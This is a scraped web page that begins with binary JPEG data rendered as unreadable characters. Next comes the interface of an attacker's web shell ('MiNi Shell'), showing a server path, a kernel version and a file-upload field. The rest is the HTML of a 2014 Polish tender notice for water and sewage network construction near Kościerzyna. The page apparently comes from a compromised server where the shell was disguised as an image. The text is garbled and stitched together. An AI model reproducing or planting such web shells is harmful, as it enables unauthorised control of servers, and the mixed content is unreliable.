JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140819/275660-N-2014.html

<p class="kh_header"><b>Kościerzyna: Budowa sieci wodociągowej i sieci kanalizacji sanitarnej w miejscowościach  Wielki Klincz, Skorzewo i Nowy Klincz, gm. Kościerzyna</b><br>
<b>Numer ogłoszenia: 275660 - 2014; data zamieszczenia: 19.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Komunalny Gminy Kościerzyna , Stare Nadleśnictwo 5, 83-400 Kościerzyna, woj. pomorskie, tel. 058 6866342, faks 058 6866960.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci wodociągowej i sieci kanalizacji sanitarnej w miejscowościach  Wielki Klincz, Skorzewo i Nowy Klincz, gm. Kościerzyna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na Budowa sieci wodociągowej i sieci kanalizacji sanitarnej w miejscowościach  Wielki Klincz, Skorzewo i Nowy Klincz, gm. Kościerzyna .  
 Zakres zamówienia obejmuje:
1. Wielki Klincz ul. Słoneczna - Budowa sieci wodociągowej.
Podstawowe parametry techniczne sieci wodociągowej:
Materiał do budowy sieci wodociągowej:
- rury wodociągowe PEHD90, DN 90 x 5,4 mm, SDR 17, PN 10, zgrzewane doczołowo
Długość sieci wodociągowej DN 90: 791 m
Ilość hydrantów  nadziemnych p-poż z zasuwą DN 80:  6 kpl.
Uwaga: tylko sieć wodociągowa.
2. Wielki Klincz ul. Rzemieslnicza - Budowa sieci wodociągowej i sieci  kanalizacji sanitarnej wraz  z przykanalikami.
Podstawowe parametry techniczne projektowanej sieci wodociągowej:
Materiał do budowy sieci wodociągowej:
- rury wodociągowe PEHD100, DN 110 x 6,6 mm, SDR 17, PN 10, zgrzewane doczołowo
Długość sieci wodociągowej DN 110: 1601 m
Ilość hydrantów  nadziemnych p-poż  z zasuwą DN 80: 10 kpl.
Parametry techniczne projektowanej kanalizacji sanitarnej grawitacyjnej:
kanały wykonane z rur kanalizacyjnych DN 200 mm z litego PVC /wg PN-EN1401:1999/ SDR 34 SN8 /klasa S 8 kN/m2/ łączone na uszczelkę gumową 2216 mb.
kanały wykonane z rur kanalizacyjnych DN 160 mm z litego PVC /wg PN-EN1401:1999/ SDR 34 SN8 /klasa S 8 kN/m2/ łączone na uszczelkę gumową 600 mb.
studnie kanalizacyjne betonowe z elementów prefabrykowanych DN 1200 mm - 58 szt.
studzienka kanalizacyjna z tworzywa sztucznego DN 425 mm - 9 szt.
Parametry techniczne projektowanej kanalizacji sanitarnej tłocznej:
- rury kanalizacyjne w sztangach PE 100, SDR 26, PN 6, zgrzewane doczołowo o średnicy DN
90x3,5mm i długości L=14,7m.
- studnia włączeniowa DN1200mm - 1 szt.
- studnia rozpręSna DN1200mm - 1 szt.
Pompownia wykonana w formie prefabrykowanej wyposażoną w dwie pompy zatapialne do ścieków
sanitarnych w tym jedna stanowi całkowitą rezerwę dla drugiej pompy.
Obliczona ilość dopływających do pompowni
Qśr dobowe : 172 M x 0,09 m3/dobę = 15,48 m3/dobę
Qmax dobowe = Qdśr x Nd = 15,48m3/d x 2 =30,96 m3/d
Qmax godzinowe = (Qdmax : 16 h) x Nh = (30,96 m3/d : 16) x 3 = 5,80 m3/h = 1,61 dm3/s
3.  Nowy Klincz - Budowa sieci wodociągowej.
 Podstawowe parametry techniczne projektowanej sieci wodociągowej:
Materiał do budowy sieci wodociągowej:
- rury wodociągowe PEHD 100, DN 90 x 5,4 mm, SDR 17, PN 10, zgrzewane doczołowo,
- rury wodociągowe PEHD 100, DN 110 x 6,6 mm, SDR 17, PN 10, zgrzewane doczołowo,
Zestawienie długości rur:
PE-HD SDR 17 PN10, PE100 DN90 x 5,4 mm L = 667,8 m
PE-HD SDR 17 PN10, PE100 DN110 x 6,6 mm L = 323,8 m
Zestawienie ilości armatury:
Ilość  hydrantów nadziemnych technologicznych z zasuw_ DN 80: 5 kpl.
4. Skorzewo - Budowa sieci wodociągowej.
Podstawowe parametry techniczne projektowanej sieci wodociągowej:
PEHD 100, DN 90 x 5,4 mm, SDR 17, PN 10, zgrzewane doczołowo o długości łącznej L=728,3m,
Hydranty nadziemne technologiczne z zasuw	 DN80 - 5 szt.
Uwaga: tylko sieć wodociągowa..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.10.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda wniesienia wadium w wysokości 
      Część 1 -    2000  zł. 
      Część 2 -  12500  zł. 
      Część 3 -    3000  zł. 
      Część 4 -    2000  zł. 
2.Wadium należy wnieść w nieprzekraczalnym terminie do 03.09.2014 r. do godz. 10:00</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przedmiotowego warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Warunek ten zostanie uznany za spełniony jeśli Wykonawca przedłoży oświadczenie o spełnianiu warunków - wypełnione i podpisane, według wzoru stanowiącego załącznik  nr 1 do formularza oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przedmiotowego warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie roboty budowlane, polegającą na budowie sieci wodociągowej i sieci kanalizacyjnej  o łącznej wartości nie mniejszej niż 300.000 zł brutto;
Na potwierdzenie spełnienia warunku Wykonawca składa wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przedmiotowego warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Warunek ten zostanie uznany za spełniony jeśli Wykonawca przedłoży oświadczenie o spełnianiu warunków - wypełnione i podpisane, według wzoru stanowiącego załącznik  nr 1 do formularza oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony jeżeli Wykonawca wykaże, iż na czas realizacji zamówienia, wśród osób wykonujących zamówienie dysponuje, bądź będzie dysponował  do pełnienia funkcji kierownika budowy - minimum jedną osobą posiadającą uprawnienia budowlane  do kierowania robotami budowlanymi w specjalności instalacyjno-inżynieryjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych  lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa,
Wzór wykazu osób, o którym mowa wyżej stanowi załącznik nr 3 do formularza oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przedmiotowego warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Warunek ten zostanie uznany za spełniony jeśli Wykonawca przedłoży oświadczenie o spełnianiu warunków - wypełnione i podpisane, według wzoru stanowiącego załącznik  nr 1 do formularza oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Na podstawie § 1 ust. 4 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r. poz. 231) Zamawiający wymaga, aby Wykonawca w celu wykazania spełniania warunku udziału w postępowaniu w zakresie posiadania wymaganej wiedzy i doświadczenia załączył do oferty wykaz wykonanych robót budowlanych oraz dowody, o których mowa wyżej, jedynie w takim zakresie, jaki jest niezbędny do potwierdzenia wykazania spełniania przez Wykonawcę zastrzeżonego przez Zamawiającego warunku udziału w postępowaniu.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy Wykonawca przy wykonywaniu zamówienia polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wzór umowy  stanowi załącznik nr 7 do SIWZ
2.	Zamawiający na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych (j.t.Dz. U. z 2013 r.  poz. 907 ze zm.) przewidział możliwość dokonania zmiany umowy w formie pisemnej pod rygorem nieważności pod następującymi warunkami:
1)	zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy, w przypadku:
a)	wprowadzenia zmian w dokumentacji techniczno - projektowej, co może powodować brak możliwości dotrzymania pierwotnego terminu zakończenia realizacji zawartej umowy;
b)	przerw w realizacji robót budowlanych powstałych z przyczyn nie leżących po stronie Wykonawcy;
c)	zlecenia przez Zamawiającego robót dodatkowych lub zamiennych, jeżeli terminy ich zlecenia, rodzaj lub zakres uniemożliwiają dotrzymanie pierwotnego terminu zakończenia realizacji umowy;
d)	pisemnego uzgodnienia pomiędzy Stronami dotyczącego skrócenia terminu zakończenia realizacji umowy;
e)	zaszła konieczność uzyskania niemożliwych do przewidzenia na etapie planowania inwestycji: danych, zgód, pozwoleń osób trzecich lub właściwych organów;
f)	prace objęte umową zostały wstrzymane przez właściwe organy, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy.
2)	zmiana nazw, siedziby stron umowy, numerów kont bankowych innych danych identyfikacyjnych;
3)	zmiana podwykonawcy pod warunkiem odpowiedniego zgłoszenia i po akceptacji przez Zamawiającego;
4)	zmiana w zakresie wprowadzenia zapisu - informacji o przyznanym lub możliwym dofinansowaniu ze źródeł zewnętrznych;
5)	zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy;
6)	zmiana formy zabezpieczenia należytego wykonania umowy;
7)	zmniejszenie zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia;
8)	zmiana zestawienia rzeczowo-finansowego z powodu zmniejszenia zakresu rzeczowo-finansowego, zmiany terminu lub zmiany terminów realizacji poszczególnych etapów realizacji przedmiotu zamówienia;
9)	ustalenie innych warunków lub terminów płatności,
10)	zmiany kolejności wykonania części zamówienia bądź rezygnacji z wykonania części zamówienia,
11)	wykonanie robót budowlanych zamiennych, w przypadku uzasadnionego wniosku jednej ze Stron i po zaakceptowaniu przez drugą Stronę
12)	zmiany terminów płatności w wyniku podpisania aneksu do umowy o dofinansowanie zadania, zmieniającego zasady i terminy jego realizacji;
13)	zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie
dostosowanie treści umowy do aktualnego stanu prawnego, w tym np. podatku VAT;
14)	wystąpienia zmiany określającej sposób wykonania robót - w przypadku, w którym służyć to będzie podniesieniu standardu przedmiotu zamówienia i nie będzie to wykraczało poza określenie przedmiotu zamówienia zawartego w SIWZ oraz nie będzie powodowało zwiększenia wynagrodzenia Wykonawcy, ani konieczności zmiany terminu wykonania zamówienia;
15)	wystąpienia udokumentowanej zmiany warunków atmosferycznych uniemożliwiających wykonanie robót,
16)	wystąpienie różnego rodzaju klęsk żywiołowych, epidemii, operacji wojennych,
strajku generalnego.
3.	Zmiany, o których mowa w pkt. 17.2 dokonywane będą wyłącznie pod warunkiem złożenia wniosku przez jedną ze Stron i po akceptacji przez drugą Stronę.
4.	Wszelkie zmiany oraz uzupełnienia umowy, z zastrzeżeniem § 6 ust. 11 umowy, wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.koscierzyna.pl//ZKGK-zamówienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Komunalny Gminy Kościerzyna
Stare Nadleśnictwo 5,
83-400 Kościerzyna
Sekretariat pok. nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2014 godzina 10:00, miejsce: Zakład Komunalny Gminy Kościerzyna
Stare Nadleśnictwo 5,
83-400 Kościerzyna
Sekretariat pok. nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wielki Klincz ul. Słoneczna - Budowa sieci wodociągowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podstawowe parametry techniczne sieci wodociągowej:
Materiał do budowy sieci wodociągowej:
- rury wodociągowe PEHD90, DN 90 x 5,4 mm, SDR 17, PN 10, zgrzewane doczołowo
Długość sieci wodociągowej DN 90: 791 m
Ilość hydrantów  nadziemnych p-poż z zasuwą DN 80:  6 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wielki Klincz ul. Rzemieslnicza - Budowa sieci wodociągowej i sieci  kanalizacji sanitarnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podstawowe parametry techniczne projektowanej sieci wodociągowej:
Materiał do budowy sieci wodociągowej:
- rury wodociągowe PEHD100, DN 110 x 6,6 mm, SDR 17, PN 10, zgrzewane doczołowo
Długość sieci wodociągowej DN 110: 1601 m
Ilość hydrantów  nadziemnych p-poż  z zasuwą DN 80: 10 kpl.
Parametry techniczne projektowanej kanalizacji sanitarnej grawitacyjnej:
kanały wykonane z rur kanalizacyjnych DN 200 mm z litego PVC /wg PN-EN1401:1999/ SDR 34
SN8 /klasa S 8 kN/m2/ łączone na uszczelkę gumową 2216 mb.
kanały wykonane z rur kanalizacyjnych DN 160 mm z litego PVC /wg PN-EN1401:1999/ SDR 34
SN8 /klasa S 8 kN/m2/ łączone na uszczelkę gumową 600 mb.
studnie kanalizacyjne betonowe z elementów prefabrykowanych DN 1200 mm - 58 szt.
studzienka kanalizacyjna z tworzywa sztucznego DN 425 mm - 9 szt.
Parametry techniczne projektowanej kanalizacji sanitarnej tłocznej:
- rury kanalizacyjne w sztangach PE 100, SDR 26, PN 6, zgrzewane doczołowo o średnicy DN
90x3,5mm i długości L=14,7m.
- studnia wyłączeniowa DN1200mm - 1 szt.
- studnia rozprężna DN1200mm - 1 szt.
Pompownia wykonana w formie prefabrykowanej wyposażoną w dwie pompy zatapialne do ścieków
sanitarnych w tym jedna stanowi całkowitą rezerwę dla drugiej pompy.
Obliczona ilość dopływających do pompowni
Qśr dobowe : 172 M x 0,09 m3/dobę = 15,48 m3/dobę
Qmax dobowe = Qdśr x Nd = 15,48m3/d x 2 =30,96 m3/d
Qmax godzinowe = (Qdmax : 16 h) x Nh = (30,96 m3/d : 16) x 3 = 5,80 m3/h = 1,61 dm3/s.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Nowy Klincz - Budowa sieci wodociągowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podstawowe parametry techniczne projektowanej sieci wodociągowej:
Materiał do budowy sieci wodociągowej:
- rury wodociągowe PEHD 100, DN 90 x 5,4 mm, SDR 17, PN 10, zgrzewane doczołowo,
- rury wodociągowe PEHD 100, DN 110 x 6,6 mm, SDR 17, PN 10, zgrzewane doczołowo,
Zestawienie długości rur:
PE-HD SDR 17 PN10, PE100 DN90 x 5,4 mm L = 667,8 m
PE-HD SDR 17 PN10, PE100 DN110 x 6,6 mm L = 323,8 m
rura stalowa osłonowa DN 159x5,6 mm L = 4,0 m
Zestawienie ilości armatury:
Ilość  hydrantów nadziemnych technologicznych z zasuw_ DN 80: 5 kpl..</p></li>
